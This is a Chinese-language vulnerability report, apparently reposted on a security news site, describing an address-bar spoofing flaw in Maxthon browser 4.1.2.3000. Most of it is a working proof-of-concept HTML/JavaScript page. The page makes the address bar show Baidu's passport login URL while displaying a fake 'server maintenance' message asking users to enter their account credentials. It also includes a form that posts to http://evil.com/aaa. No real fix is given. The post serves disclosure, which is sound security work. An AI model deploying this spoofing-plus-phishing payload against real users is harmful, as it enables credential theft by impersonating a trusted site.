傲游浏览器4.1.2.3000 伪造任意网站内容

浏览:
字体:
发布时间:2013-12-09 23:23:45
来源:
俺也是遨游的老用户了其实 - - 你故意五天忽略 漏洞还是在那儿 你偷偷修复了……结果还是没照顾到这个问题……Base+A跟直接地址栏打开网址逻辑不一样是为甚……和以前spoof只能spoof不存在的网站不同 这个spoof只能spoof已经存在的网站 没细看 新遨游貌似是修复了不存在的网站耗时过多的问题 存在的还是有逻辑问题
 
<html><base href="https://passport.baidu.com/aclogin.php?queryWord="><div style="display:none"><a href="#" id="ak">asd</a></div><script>document.writeln("<title>Hello World</title>");document.writeln("<h1>伪造网页</h1>");document.writeln("百度服务器维护,在此输入您的帐号密码。 这样写是不是显得危害大一点? 帐号<form method=post action=http://evil.com/aaa><input type=text/></form> ");var s="W";var i=0;var dd=0;for(i=0;i<30000;i++)s+=('A'+Math.random()*10);document.getElementById("ak").href=s;function x(){if(dd==0){dd=1;document.getElementById("ak").click();}else{document.write("<scr"+"ipt>function e(){window.stop();document.stop();document.writeln('<title>Hello World</title>');document.writeln('<h1>伪造网页</h1>');document.writeln('这个部分是伪造的。你懂得2。');}</scr"+"ipt>");}document.stop();window.stop();window.stop();window.stop();window.stop();document.stop();}setInterval("x();",2130);</script></html>

 

 
 
如果偶尔出411了 刷新几次 随机数据嘛~
 
不像以前点击关闭之后地址栏会变回本地路径 这儿点击关闭之后地址栏路径就变成 A HREF里面的地址了 所以可以SPOOF
 
当然 不点效果也是一样 只不过多个圈看起来挺烦人的
 
 
修复方案:
大牛们 你们都懂的
>更多相关文章
24小时热门资讯
24小时回复排行
资讯 | QQ | 安全 | 编程 | 数据库 | 系统 | 网络 | 考试 | 站长 | 关于东联 | 安全雇佣 | 搞笑视频大全 | 微信学院 | 视频课程 |
关于我们 | 联系我们 | 广告服务 | 免责申明 | 作品发布 | 网站地图 | 官方微博 | 技术培训
Copyright © 2007 - 2024 Vm888.Com. All Rights Reserved
粤公网安备 44060402001498号 粤ICP备19097316号 请遵循相关法律法规
');})();